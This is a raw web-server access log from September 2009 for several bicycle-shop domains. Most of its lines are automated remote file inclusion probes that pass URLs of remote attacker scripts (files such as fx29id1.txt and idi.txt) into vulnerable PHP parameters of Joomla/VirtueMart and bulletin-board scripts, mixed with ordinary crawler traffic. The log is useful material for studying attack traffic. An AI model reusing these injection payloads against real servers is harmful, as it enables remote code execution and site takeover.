195.186.64.229 - - [10/Sep/2009:15:26:14 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
98.202.220.151 - - [10/Sep/2009:15:30:27 -0700] "GET /logs//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
98.202.220.151 - - [10/Sep/2009:15:30:27 -0700] "GET /skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
98.202.220.151 - - [10/Sep/2009:15:30:27 -0700] "GET /logs/access.log%20%20//skin/ggambo7002_board/write.php/skin/ggambo7002_board/comment_modify.php?dir=http://www.blve.jp/html/uploads/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
80.67.26.96 - - [10/Sep/2009:15:45:56 -0700] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.hotlinkfiles.com/files/2821123_nrpeo/src.txt??? HTTP/1.1" 200 2373 "-" "Mozilla/5.0" "www.svbikes.com"
72.30.87.112 - - [10/Sep/2009:15:46:48 -0700] "GET /bullitinboard/viewtopic.php?p=11362 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
63.247.138.55 - - [10/Sep/2009:16:41:31 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
63.247.138.55 - - [10/Sep/2009:16:41:31 -0700] "GET /translations/Chinese-Big5.txt//tools/send_reminders.php?noSet=0&includedir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
63.247.138.55 - - [10/Sep/2009:16:41:31 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
63.247.138.55 - - [10/Sep/2009:16:43:37 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
63.247.138.55 - - [10/Sep/2009:16:43:37 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
63.247.138.55 - - [10/Sep/2009:16:43:37 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
63.247.138.55 - - [10/Sep/2009:16:43:37 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
63.247.138.55 - - [10/Sep/2009:16:43:37 -0700] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
63.247.138.55 - - [10/Sep/2009:16:43:37 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
63.247.138.55 - - [10/Sep/2009:16:43:37 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
63.247.138.55 - - [10/Sep/2009:16:43:37 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.biig.net/httpdocs/wp-content/uploads/js_cache/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.75.202.55 - - [10/Sep/2009:16:45:24 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.75.202.55 - - [10/Sep/2009:16:45:24 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.75.202.55 - - [10/Sep/2009:16:45:24 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.75.202.55 - - [10/Sep/2009:16:45:41 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.75.202.55 - - [10/Sep/2009:16:45:41 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.75.202.55 - - [10/Sep/2009:16:45:41 -0700] "GET /translations/Korean.txt//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.75.202.55 - - [10/Sep/2009:16:46:16 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
62.75.202.55 - - [10/Sep/2009:16:46:28 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.75.202.55 - - [10/Sep/2009:16:46:28 -0700] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.75.202.55 - - [10/Sep/2009:16:46:28 -0700] "GET /translations/German.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.75.202.55 - - [10/Sep/2009:16:46:28 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.75.202.55 - - [10/Sep/2009:16:46:28 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.75.202.55 - - [10/Sep/2009:16:46:28 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.75.202.55 - - [10/Sep/2009:16:46:28 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.75.202.55 - - [10/Sep/2009:16:46:30 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.75.202.55 - - [10/Sep/2009:16:46:30 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.75.202.55 - - [10/Sep/2009:16:46:30 -0700] "GET /translations/German.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.75.202.55 - - [10/Sep/2009:16:46:30 -0700] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.75.202.55 - - [10/Sep/2009:16:46:30 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.75.202.55 - - [10/Sep/2009:16:46:30 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.75.202.55 - - [10/Sep/2009:16:46:30 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
62.75.202.55 - - [10/Sep/2009:16:46:32 -0700] "GET /translations/Finnish.txt//tools/send_reminders.php?noSet=0&includedir=http://tiete.com.br/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
80.172.236.56 - - [10/Sep/2009:16:48:19 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.reitsport-meier.de//installation/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:16:48:19 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.reitsport-meier.de//installation/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:16:48:19 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.reitsport-meier.de//installation/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:16:50:04 -0700] "GET /logs/access.log%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.reitsport-meier.de//installation/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:16:51:04 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:16:51:04 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:16:51:09 -0700] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.hackclub.com.ar/javascript//id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.30.78.218 - - [10/Sep/2009:17:04:23 -0700] "GET /tmp/?M=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
81.19.66.38 - - [10/Sep/2009:17:30:22 -0700] "GET /bullitinboard/viewtopic.php?p=1663 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Sep/2009:17:30:22 -0700] "GET /bullitinboard/viewtopic.php?p=1968 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Sep/2009:17:30:23 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Sep/2009:17:30:24 -0700] "GET /bullitinboard/viewtopic.php?p=2005 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Sep/2009:17:30:25 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
72.30.87.112 - - [10/Sep/2009:17:58:13 -0700] "GET /bullitinboard/viewtopic.php?p=15851 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
79.13.185.108 - - [10/Sep/2009:18:25:48 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.13.185.108 - - [10/Sep/2009:18:25:48 -0700] "GET /logs/access.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
79.13.185.108 - - [10/Sep/2009:18:25:48 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.30.3.225 - - [10/Sep/2009:18:30:37 -0700] "GET /translations/Chinese-Big5.txt//tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
204.30.3.225 - - [10/Sep/2009:18:30:37 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
204.30.3.225 - - [10/Sep/2009:18:30:51 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
211.189.18.73 - - [10/Sep/2009:18:33:49 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.reitsport-meier.de//installation/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.189.18.73 - - [10/Sep/2009:18:33:49 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.reitsport-meier.de//installation/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
211.189.18.73 - - [10/Sep/2009:18:33:49 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.reitsport-meier.de//installation/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "houstonbikeshop.com"
204.30.3.225 - - [10/Sep/2009:18:37:49 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
204.30.3.225 - - [10/Sep/2009:18:37:49 -0700] "GET /translations/Spanish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
204.30.3.225 - - [10/Sep/2009:18:37:51 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.30.3.225 - - [10/Sep/2009:18:37:51 -0700] "GET /translations/Portuguese.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.30.3.225 - - [10/Sep/2009:18:37:51 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.30.3.225 - - [10/Sep/2009:18:38:02 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
204.30.3.225 - - [10/Sep/2009:18:38:07 -0700] "GET /translations/Polish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.30.3.225 - - [10/Sep/2009:18:38:09 -0700] "GET /translations/Swedish.txt%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "bicyclestoreshouston.com"
211.189.18.73 - - [10/Sep/2009:18:39:41 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "houstonbikeshop.com"
211.189.18.73 - - [10/Sep/2009:18:39:41 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "houstonbikeshop.com"
211.189.18.73 - - [10/Sep/2009:18:39:41 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "houstonbikeshop.com"
204.30.3.225 - - [10/Sep/2009:18:50:36 -0700] "GET /translations/Hungarian.txt//tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.svbikes.com"
81.19.66.38 - - [10/Sep/2009:19:00:54 -0700] "GET /bullitinboard/viewtopic.php?p=1624 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Sep/2009:19:00:55 -0700] "GET /bullitinboard/viewtopic.php?p=1972 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Sep/2009:19:00:56 -0700] "GET /bullitinboard/viewtopic.php?p=2036 HTTP/1.1" 200 533 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
81.19.66.38 - - [10/Sep/2009:19:00:56 -0700] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.1" 200 534 "-" "StackRambler/2.0 (MSIE incompatible)" "houstonbikeshop.com"
204.30.3.225 - - [10/Sep/2009:19:11:35 -0700] "GET /translations/Polish.txt//tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
204.30.3.225 - - [10/Sep/2009:19:11:36 -0700] "GET /translations/Portuguese.txt//tools/send_reminders.php?noSet=0&includedir=http://www.hanarokorea.com/bbs/icon/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
72.30.87.112 - - [10/Sep/2009:19:13:11 -0700] "GET /fit.html HTTP/1.0" 200 17443 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
72.30.78.218 - - [10/Sep/2009:19:22:32 -0700] "GET /bullitinboard/viewtopic.php?p=15959 HTTP/1.0" 200 517 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
216.129.119.14 - - [10/Sep/2009:19:24:43 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "bicyclestoreshouston.com"
80.92.181.165 - - [10/Sep/2009:19:33:13 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "HolmesBot (http://holmes.ge)" "www.svbikes.com"
114.4.8.14 - - [10/Sep/2009:20:00:55 -0700] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [10/Sep/2009:20:00:55 -0700] "GET /logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
114.4.8.14 - - [10/Sep/2009:20:01:57 -0700] "GET /logs/access.log////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.184.252.3 - - [10/Sep/2009:20:03:32 -0700] "GET /logs////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
58.184.252.3 - - [10/Sep/2009:20:03:32 -0700] "GET /logs/access.log%20%20////components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.206.123.177 - - [10/Sep/2009:20:05:41 -0700] "GET /translations/Portuguese.txt%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.206.123.177 - - [10/Sep/2009:20:05:41 -0700] "GET /translations/?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 200 3847 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.206.123.177 - - [10/Sep/2009:20:05:42 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.206.123.177 - - [10/Sep/2009:20:05:47 -0700] "GET /translations/English-US.txt%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.206.123.177 - - [10/Sep/2009:20:05:53 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 200 1764 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.206.123.177 - - [10/Sep/2009:20:05:53 -0700] "GET /translations/?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 200 3847 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.206.123.177 - - [10/Sep/2009:20:05:53 -0700] "GET /translations/Portuguese.txt%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
211.206.123.177 - - [10/Sep/2009:20:05:55 -0700] "GET /translations/English-US.txt%20%20/?_SERVER[DOCUMENT_ROOT]=http://www.seorakhoney.com/shop/fx29id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
77.88.43.25 - - [10/Sep/2009:20:15:27 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.svbikes.com"
72.30.87.112 - - [10/Sep/2009:20:31:27 -0700] "GET /Employeesite/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
72.30.78.218 - - [10/Sep/2009:20:34:43 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
195.228.74.243 - - [10/Sep/2009:20:38:07 -0700] "GET /translations//xmlrpc.php HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:20:45:39 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "houstonbikeshop.com"
72.30.78.218 - - [10/Sep/2009:20:49:50 -0700] "GET /Employeesite/ HTTP/1.0" 401 395 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:20:55:41 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.reitsport-meier.de//installation/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:20:55:41 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.reitsport-meier.de//installation/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:20:55:41 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.reitsport-meier.de//installation/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:20:58:33 -0700] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:20:58:34 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "houstonbikeshop.com"
80.172.236.56 - - [10/Sep/2009:20:58:34 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "houstonbikeshop.com"
62.140.23.192 - - [10/Sep/2009:20:59:11 -0700] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [10/Sep/2009:20:59:11 -0700] "GET /logs/access.log%20%20/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [10/Sep/2009:20:59:12 -0700] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [10/Sep/2009:20:59:49 -0700] "GET ////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
62.140.23.192 - - [10/Sep/2009:20:59:49 -0700] "GET /logs/////bbs//skin/ggambo7002_board/write.php?dir=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "houstonbikeshop.com"
